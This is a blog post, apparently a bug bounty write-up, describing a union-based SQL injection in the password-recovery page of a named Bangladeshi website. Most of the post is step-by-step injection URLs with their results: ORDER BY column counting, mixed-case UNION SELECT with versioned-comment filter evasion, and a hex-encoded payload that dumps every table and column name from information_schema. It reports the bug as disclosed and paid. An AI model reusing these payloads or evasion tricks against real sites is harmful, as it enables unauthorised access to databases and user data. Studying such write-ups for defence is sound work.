Bug Bounty at Bangladeshi Site.

Shaifullah Shaon
Jul 15, 2018 · 2 min read

Hello,

I am Shaifullah Shaon (Black_EyE) As Admin (CEO) at Cyber Terminator Army.

I was found Multi Vuln Disclose.

1st : http://rediact.com/(Another Dir)/admin

I was that panel Yet and I was Reported that Issue Yet. After Gotten This Issue I was Got 10K BDT yet.

Recently I tried to find another bug of that site after 8 Months.

Try to find again that url. After that the url are shown me 404 Not Found.

http://rediact.com/(Another Dir)/admin == > 404 Not Found!!!

Now tried again remove /admin.

Now What I Seen there. Site okk. Try to add “/login” replace with “/admin”, Now I am seen 403 Forbidden in that site. Now I just Ask with my brain, Something is there. Back to the site again. uri = http://rediact.com/(Another Dir)/

Try to Create a new Account. After creating account I don’t try to verify the account with mobile number. Now I am trying to recover my password.

What I seen !!!

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)&uname=(username)

Now try to sql injection there.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)’&uname=(username)=> Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)’ — -&uname=(username) => Error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 10 — -&uname=(username) => error

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 2 — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 3 — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num)order by 4 — -&uname=(username) => error

Found the length of vuln column.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,3 — -&uname=(username) => 200 ok

N.B: Generally My Pattern to write union select is mixed case.

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,vulnerable — -&uname=(username) => 200 ok

http://rediact.com/(Another Dir)/recover_pass/?id=(user id as num) and false uNioN SeLecT 1,2,COncAt(version(),0x3c2f7469746c653e,0x3c666f6e7420636f6c6f723d7265643e,0x3c68313e496e6a656374656420427920436c6f7564792056697275733c2f68313e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x55534552203d,user(),0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,0x56455253494f4e203d,version(),0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,0x4441544142415345203d20,database(),0x3c62723e,0x3c666f6e7420636f6c6f723d6d6167656e74613e,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat
(@,0x3c62723e ,TaBLe_nAMe,0x203a3a20,column_name))))a)) — -&uname=(username) => 200 ok

I reported The Issue at = 10th January, 2018

Reply Back Date & Time = 10th January, 2018

Bounty Date and Time = 18th February, 2018

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store